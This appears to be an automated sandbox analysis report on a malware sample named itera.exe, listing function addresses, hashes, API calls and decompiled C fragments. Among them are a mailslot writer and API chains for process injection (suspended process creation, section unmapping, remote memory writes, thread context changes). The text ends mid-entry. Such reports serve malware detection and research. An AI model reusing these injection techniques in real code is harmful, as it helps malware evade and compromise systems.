  • Opcode ID: 61488c984085a4f122944a9e8d254705a555d96723ee699a890829b662474710
  • Instruction ID: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
  • Opcode Fuzzy Hash: DFE02C01219EB1CFC4272014EE2813781B8FB1082A8CDB37443C00A2F2EE2825336E0B
  • Instruction Fuzzy Hash: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
APIs
    • Part of subcall function 002E45C1: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 002E4610
    • Part of subcall function 002E475C: lstrlen.KERNEL32(002E618C,00000000,?,00000027,002E618C,00000000,00000000,002E822E,00000000,?,002E618C,00000000,00000000), ref: 002E4792
    • Part of subcall function 002E475C: lstrcpy.KERNEL32(00000000,00000000), ref: 002E47B6
    • Part of subcall function 002E475C: lstrcat.KERNEL32(00000000,00000000), ref: 002E47BE
  • HeapFree.KERNEL32(00000000,?,Local\), ref: 002E1217
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Similar Non-Executed Functions

Function 002E4B73, Relevance: 7.6, APIs: 5, Instructions: 59 Total matches: 218stringthreadtime
Similarity
  • Total matches: 218
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
  • String ID:
  • API String ID: 1809591024-0
  • Opcode ID: e1752541d73a16271eeb0a7262a47e2e067e5139649c82f5e8bd71f01fb1fcfd
  • Instruction ID: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
  • Opcode Fuzzy Hash: 28D02E858E0880DB9D3B8808E04072682C22C2830218C78164A0A317226F20318FFF2D
  • Instruction Fuzzy Hash: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
APIs
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • GetCurrentThreadId.KERNEL32(?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BAB
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BB7
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 002E4BC5
  • PathFindExtensionA.SHLWAPI(00000000), ref: 002E4BD9
  • lstrcpy.KERNEL32(00000000), ref: 002E4BE0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E29FB, Relevance: 6.0, APIs: 4, Instructions: 38 Total matches: 305
Similarity
  • Total matches: 305
  • API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
  • String ID:
  • API String ID: 4193297829-0
  • Opcode ID: d8dea5f47279ff853c8e6c0729a614c8beac44f71225f0b0d2aaa62a2a57016e
  • Instruction ID: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
  • Opcode Fuzzy Hash: DAD0A7451C88F0D668246492EC8C7740B427C773CEC1D1000009864A01CBD9FFB37D5C
  • Instruction Fuzzy Hash: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,002E7494,002E1728,?,002E7494), ref: 002E2A0A
  • GetVersion.KERNEL32(?,002E7494), ref: 002E2A19
  • GetCurrentProcessId.KERNEL32(?,002E7494), ref: 002E2A30
  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,002E7494), ref: 002E2A49
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E2CD0, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 108 Total matches: 183string
Similarity
  • Total matches: 183
  • API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
  • String ID: <
  • API String ID: 1457465641-4251816714
  • Opcode ID: 3f2b9fcc2af1264bbed65c952509bd9e2800f2d6ba6530589bf9dcfa6290030a
  • Instruction ID: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
  • Opcode Fuzzy Hash: 03F0AC60AB2683C5CCF35840E54579D87C06B21A79C8C4B315508F45A77F28325F4F6C
  • Instruction Fuzzy Hash: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
APIs
  • memset.NTDLL ref: 002E2CEE
  • CoInitializeEx.OLE32(00000000,00000002), ref: 002E2CF9
  • PathFindExtensionW.SHLWAPI(00000000), ref: 002E2D14
  • lstrcpyW.KERNEL32(00000000,002E8224), ref: 002E2D29
  • lstrlen.KERNEL32(002E7494,?,?,?,?,?,?,?,?,?,?,002E18D7,?), ref: 002E2D46
  • lstrcpyW.KERNEL32(00000000,002E84B8), ref: 002E2D77
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • wsprintfW.USER32 ref: 002E2DAE
  • ShellExecuteExW.SHELL32(0000003C), ref: 002E2DE3
  • CoUninitialize.OLE32 ref: 002E2DF7
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E4B0D, Relevance: 9.0, APIs: 6, Instructions: 40 Total matches: 320file
Similarity
  • Total matches: 320
  • API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
  • String ID:
  • API String ID: 3756146440-0
  • Opcode ID: 13a3fbb8c54243ae1405e1c57313f2c46c53332a02a93cc9283264dcae27056a
  • Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
  • Opcode Fuzzy Hash: 49D0224D1F030BD4C82394A2E0C2F10C6823F32100D3C022402082836B8F3631EFDE6D
  • Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
APIs
  • CreateFileW.KERNEL32(002E7494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 002E4B26
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B33
  • WriteFile.KERNEL32(00000000,?,00001000,002E7494,00000000), ref: 002E4B49
  • SetEndOfFile.KERNEL32(00000000,?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B54
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B5C
  • CloseHandle.KERNEL32(00000000), ref: 002E4B65
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E1395, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71 Total matches: 162processmemory
Similarity
  • Total matches: 162
  • API ID: CreateProcessGetLastErrorHeapFreememset
  • String ID: D
  • API String ID: 1501718689-2746444292
  • Opcode ID: ec666d8859198cc6dc2f36418ca03840fabeabaa94e38ef7fe01e5326dfd4177
  • Instruction ID: 110f424a9e0f0e5d3f86d35bf262195d206ca1f37b0b6fadae47027560f24ba8
  • Opcode Fuzzy Hash: 73E0D8861F0CD5D2C8946488F1A3F51E7202F9045ACCEA72106A9281676E24F45F8BA9
  • Instruction Fuzzy Hash: 110f424a9e0f0e5d3f86d35bf262195d206ca1f37b0b6fadae47027560f24ba8
APIs
  • memset.NTDLL ref: 002E13B5
    • Part of subcall function 002E3340: GetProcAddress.KERNEL32(002E866B,002E45D9,00000000,002E618C,00000000,00000000,?,?,?,002E11A6,?,002E618C,00000000,00000000), ref: 002E3354
  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,04000004,00000000,00000000,00000044,?), ref: 002E13EE
  • GetLastError.KERNEL32(00000001), ref: 002E1422
  • HeapFree.KERNEL32(00000000,00000000), ref: 002E1433
    • Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
    • Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
    • Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E4A60, Relevance: 7.6, APIs: 5, Instructions: 72 Total matches: 377file
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 9f3baee91e90600c7ef65055cc937090c80b1848b2f2516f31576c2ec84c2916
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E02608AE0A47CCD46B9C42D482F00A7826F61609DAD39655208293734F2132AFEB3C
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E4A7E
  • GetFileSize.KERNEL32(00000000,00000000,?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4A8E
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 002E4ABA
  • GetLastError.KERNEL32(?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4ADF
  • CloseHandle.KERNEL32(000000FF), ref: 002E4AF0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E2175, Relevance: 6.1, APIs: 4, Instructions: 107 Total matches: 388threadsynchronizationinjection
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 97ca6bb9ca5fe7b510779c132f311c73afcc437a32033944fe2e30fe2d70fbee
  • Instruction ID: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
  • Opcode Fuzzy Hash: B5019C47292A71C6D501A8068699739F1C3FB42EBAE2CF700D6C1B01DA0ED479F2DB6C
  • Instruction Fuzzy Hash: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
APIs
  • memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E1FFA: memset.NTDLL ref: 002E2036
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
  • SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E372A, Relevance: 5.1, APIs: 4, Instructions: 110 Total matches: 409
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: 752983b3e7944d967bfc605664b24e9bd319d7a804b265e52fc9e08d56eeb1c9
  • Instruction ID: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
  • Opcode Fuzzy Hash: C60170421A6E65C8F471D947689AB3BF487FF967F6D09F70020C23028E4E8061D71F89
  • Instruction Fuzzy Hash: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
APIs
  • memset.NTDLL ref: 002E3750
  • memcpy.NTDLL ref: 002E3778
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
  • GetLastError.KERNEL32(00000010,00000218,002E4F6D,00000100,?,00000318,00000008), ref: 002E378F
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,002E4F6D,00000100), ref: 002E3872
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Process Name: itera.exe Analysis ID: 57776

General

Root Process Name:Zx7i3Q9U9i.exe
Process MD5:1C84D323D09233F71A6087CD5DA1F24A
Total matches:32
Initial Analysis Report:Open
Initial sample Analysis ID:57776
Initial sample SHA 256:C79DB04ECADE3813D98209E48A94A8291475B3320E2966206E5E4CE416CD1D6E
Initial sample name:itera.exe

Similar Executed Functions

Function 002E3880, Relevance: 7.6, APIs: 5, Instructions: 93 Total matches: 233nativethread
Similarity
  • Total matches: 233
  • API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 405287775-0
  • Opcode ID: 16422fa5cbcf997cf8d8ddf4094cfe996cac4ccb4206dd4e90c3df64a56a7186
  • Instruction ID: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
  • Opcode Fuzzy Hash: FEF00C400F9BA0EBF812B6821491F547683BB02F32E0EF32051F200B863F02200E8B1A
  • Instruction Fuzzy Hash: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
APIs
  • memset.NTDLL ref: 002E38A2
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 002E3995
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
  • memcpy.NTDLL(00000218,002E4F92,00000100,?,00010003,?,?,00000318,00000008), ref: 002E391D
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 002E3974
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3977
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E278F, Relevance: 6.1, APIs: 4, Instructions: 79 Total matches: 297native
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: b4b338d5d8f61f66a6222dbf3d0f3f210939ec075dfbdcc0bd39eb5c8c15d6ad
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: FCE0C04226CAC4E7E9F2F8451403B2B9140BF80142D5D7BA663A88D67F0F20B0031B1E
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
  • memset.NTDLL ref: 002E280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
  • NtClose.NTDLL(?), ref: 002E283F
    • Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
    • Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3E68, Relevance: 4.5, APIs: 3, Instructions: 29 Total matches: 229memorynative
Similarity
  • Total matches: 229
  • API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3367774474-0
  • Opcode ID: 41e13fcf86dc4b3d751067dcd296ed22fbfc5f147028583741b35f2a38466cce
  • Instruction ID: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
  • Opcode Fuzzy Hash: B0C012801C1D82EAD57B9488419DB2A119677A1101C1D733211809D5407FA0305B0F1D
  • Instruction Fuzzy Hash: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
APIs
  • NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
  • SetLastError.KERNEL32(00000000), ref: 002E3EA7
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3E27, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 236native
Similarity
  • Total matches: 236
  • API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 1449157707-0
  • Opcode ID: 2ed1afa1f8d583104eaac44049c4c607334b4aa5ab8e72b653f2dcbc79efa973
  • Instruction ID: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
  • Opcode Fuzzy Hash: 95C0928B1505C74DDB3AA98181EEF4DC2C57FB177342C31094088C972E598A326B4E49
  • Instruction Fuzzy Hash: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
APIs
  • NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
  • SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3DE6, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 238native
Similarity
  • Total matches: 238
  • API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3946382534-0
  • Opcode ID: aed4696055f3d46c6fa4a2efaa20ff5ea458cda21972fc3345feb9d6d727ddb0
  • Instruction ID: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
  • Opcode Fuzzy Hash: 09C092CB1415C74DDB3AA99281EAF4DC2C57EB177342C31094088C971E598A366B4E49
  • Instruction Fuzzy Hash: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
APIs
  • NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
  • SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401639, Relevance: 16.6, APIs: 11, Instructions: 85 Total matches: 95threadsynchronization
Similarity
  • Total matches: 95
  • API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
  • String ID:
  • API String ID: 2699342322-0
  • Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
  • Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
  • Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
  • Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
C-Code - Quality: 100%
			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}













0x00401647
0x0040164f
0x00401664
0x0040166e
0x00401672
0x00401675
0x00401713
0x0040167b
0x0040168c
0x0040168e
0x00401692
0x00401695
0x004016fe
0x00401697
0x004016a0
0x004016a3
0x004016b4
0x004016e7
0x004016bb
0x004016c0
0x004016cd
0x004016d7
0x004016dc
0x004016dc
0x004016cd
0x004016f0
0x004016f0
0x00401704
0x0040170a
0x0040171c

APIs
  • CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
  • CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
  • GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
  • GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,757DC470,004016DC,?,?,00000000), ref: 004015B9
  • TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
  • CloseHandle.KERNEL32(?), ref: 004016F0
  • GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
  • CloseHandle.KERNEL32(?), ref: 00401704
  • GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 004010FB, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90 Total matches: 95sleepfile
Similarity
  • Total matches: 95
  • API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
  • String ID: \\.\mailslot\msl0
  • API String ID: 1001206095-622273203
  • Opcode ID: 003b2913688191ea114162166813de589c119e69325853280e698207d87bc8a2
  • Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
  • Opcode Fuzzy Hash: DFF02E85425EC28BC77E20443911BE16086B782F42C6CC3B29ED2342AB8F40710A9746
  • Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
C-Code - Quality: 94%
			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}

















0x004010fb
0x004010fb
0x00401104
0x00401107
0x00401118
0x00401121
0x00401124
0x00401139
0x00401126
0x0040112e
0x00401131
0x00401131
0x0040113c
0x00401145
0x004011ea
0x004011ef
0x004011ef
0x00401158
0x0040115f
0x004011da
0x004011e1
0x004011e4
0x00000000
0x004011e4
0x00401161
0x00401164
0x00401165
0x00401168
0x0040116e
0x00401170
0x00401173
0x00401175
0x00401175
0x0040118a
0x00401192
0x004011a8
0x004011b1
0x004011b4
0x00000000
0x00000000
0x00401194
0x00401194
0x00401197
0x0040119a
0x0040119c
0x004011a2
0x004011a3
0x004011a3
0x0040119c
0x004011b8
0x004011be
0x004011c8
0x004011d1
0x00000000

APIs
  • CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
  • GetLastError.KERNEL32 ref: 00401126
  • Sleep.KERNEL32(00000064), ref: 00401131
    • Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806
  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
  • GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
  • Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
  • memset.NTDLL ref: 004011C8
    • Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00401589,00401589), ref: 00401213
  • CloseHandle.KERNEL32(?), ref: 004011E4
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E1224, Relevance: 13.6, APIs: 9, Instructions: 77 Total matches: 182registrymemorystring
Similarity
  • Total matches: 182
